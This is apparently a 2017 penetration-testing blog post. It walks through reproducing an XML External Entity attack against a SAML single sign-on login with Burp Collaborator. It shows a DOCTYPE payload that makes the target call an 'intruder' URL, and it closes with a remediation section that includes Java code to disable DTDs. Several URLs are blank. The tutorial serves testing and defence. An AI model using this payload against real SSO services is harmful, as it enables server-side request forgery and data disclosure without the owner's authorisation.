Friday, January 13, 2017

SAML Security XML External Entity Attack

XML External Entity Attack (XXE) in a SAML-based SSO application

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server-side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

We need a Collaborator server so that we can insert unintended XML containing an unauthorized URL or file location into the request sent to the server. The Collaborator server stands in for the intruder's URL.
It records every request arriving at the Collaborator server from the target company's IP address.

We also need the SAML Raider extension to capture the SAML response when our request carries SAML content.
Burp Professional supports SAML Raider as an extension, so we download the SAML Raider jar for the installed Burp version and import it through the Burp Extender tab -> Extensions tab -> load the SAML Raider jar.

Suppose our affected url is:

The above URL is used for logging in through an HTML file (for example test.html, provided by the SSO provider) which sends a request
to our URL with a SAML response.

Suppose our test.html has the source code below. It has only a submit button and a hidden parameter.
On clicking the submit button, the user is logged in using the SAMLResponse parameter.
Our aim is to tamper with the SAMLResponse parameter value so that the server sends a request to an unintended server.

<form method="POST" action="">
<input type="hidden" name="SAMLResponse" value="aGVtYSIgeG1sbnM6eHNpPSJodHRwOi8vd3d3LnczLm" />
<input type="submit" name="Post Saml Response" value="Post Saml Response"/>
</form>

Step1: Download the Burp tool (we need Burp Professional for this)
Step2: In Burp, click on the Project options tab
Step3: Use the default Collaborator server
Step4: Click "Run health check" to confirm that the default Collaborator server is running.
Step5: Click on the Burp menu and open the Burp Collaborator client
Step6: Intercept the request through the Burp proxy and send it to Repeater; it will have a SAML Raider tab. Copy the SAML response (the SAML response is an XML document).

Step7: Now we have to send our malicious XML in the SAML response to the target URL.

For example, the intruder's XML is:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://Collaborator Server's URL" >]>


Step8: To test that our affected server is making an unintended request to the intruder's server,
we will use the default Collaborator server as the intruder's server URL.
Step9: To get our default Collaborator server URL, go to the Burp Collaborator client and click the "Copy to clipboard" button; it copies the server's URL, which should look something like this
Now replace it in the XML chunk used for the attack.
Now the XML will look like the following:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM " " >]>


Now insert our SAML response between the <foo> and </foo> tags and post the SAML response.

For example, the intruder's new XML, ready for the attack, will be something like this; the highlighted URL is the one acting as the intruder's URL:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM " " >]>

<samlp:Response ID="d4_kS-guM6wiWqkSLdWESYZ8DGv"
  IssueInstant="2016-12-21T19:15:11.418Z" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
  <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"></saml:Issuer>
    <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
  <saml:Assertion ID="YzZoJdNiWwkrRrz3pljoYUvX3Lb"
    IssueInstant="2016-12-21T19:15:11.480Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
    <ds:Signature xmlns:ds="">


As the SAML response in the original request was base64 encoded, and we have now created a new XML SAML response with the attack code inserted, copy the above SAML response and base64-encode it using any online tool.

Step10: Now open our test.html to log in through SSO and intercept the request with the Burp tool.
Send it to Repeater and, in the request parameters, replace the existing value of SAMLResponse with the newly encoded value. Now send the request.

Step11: Expected result: a request from our server ( ) is sent to the unintended server ( ), as we have inserted a DOCTYPE with a URL in the POST request.

Step12: We can verify it by refreshing the list in the Burp Collaborator client; it shows that a request from the IP of our test company was captured at the Collaborator server.

This is how the issue is reproduced.

How to fix:

The safest way to prevent XXE is always to disable DTDs (External Entities) completely. Depending on the parser, the method should be similar to the following:

factory.setFeature("", true);
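
As an added example (not the post's own code), the following Java DOM parser is configured the way the fix describes and is applied to a base64-encoded SAMLResponse parameter. The feature URIs are the standard JAXP/Xerces ones; the two sample messages and the collaborator.example URL are constructed placeholders.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXException;

public class HardenedSamlParser {

    // Build a DOM parser that refuses any DOCTYPE, so no entity can be declared in the SAMLResponse.
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // Primary control: the parser aborts as soon as it sees <!DOCTYPE ...>.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth, in case a different parser implementation ignores the feature above.
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        return factory.newDocumentBuilder();
    }

    // Decode the base64 SAMLResponse form parameter and parse it with the hardened builder.
    // Returns the DOM for a clean message; throws SAXException when the message carries a DTD.
    static Document parseSamlResponse(String base64Response) throws Exception {
        byte[] xml = Base64.getDecoder().decode(base64Response);
        return hardenedBuilder().parse(new ByteArrayInputStream(xml));
    }

    public static void main(String[] args) throws Exception {
        // Constructed samples (not from a real IdP); the SYSTEM URL is a placeholder.
        String clean = "<samlp:Response xmlns:samlp=\"urn:oasis:names:tc:SAML:2.0:protocol\" Version=\"2.0\"/>";
        String withDtd = "<?xml version=\"1.0\"?>"
            + "<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://collaborator.example/\">]>"
            + "<samlp:Response xmlns:samlp=\"urn:oasis:names:tc:SAML:2.0:protocol\">&xxe;</samlp:Response>";
        Base64.Encoder enc = Base64.getEncoder();
        Document doc = parseSamlResponse(enc.encodeToString(clean.getBytes(StandardCharsets.UTF_8)));
        System.out.println("clean root: " + doc.getDocumentElement().getNodeName());
        try {
            parseSamlResponse(enc.encodeToString(withDtd.getBytes(StandardCharsets.UTF_8)));
            System.out.println("DTD accepted: parser is NOT hardened");
        } catch (SAXException e) {
            // Reject and log; a DOCTYPE inside a SAMLResponse is the event a defender should alert on.
            System.out.println("rejected SAMLResponse with DOCTYPE: " + e.getMessage());
        }
    }
}
```

The hardened builder fails on the DOCTYPE before the parser ever resolves the entity, so no request to the SYSTEM URL is made.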

Note: delete the SAML response.
Copy the intruder's XML and replace the server name with the Collaborator client URL.
Now copy the XML and base64-encode it using online tools.
Now copy this encoded XML and paste it as the value of the POST request parameter named "SAMLResponse".
Click the Go button.
Now, if the attack has happened, our Collaborator server should receive the request from the URL where we have posted our request.
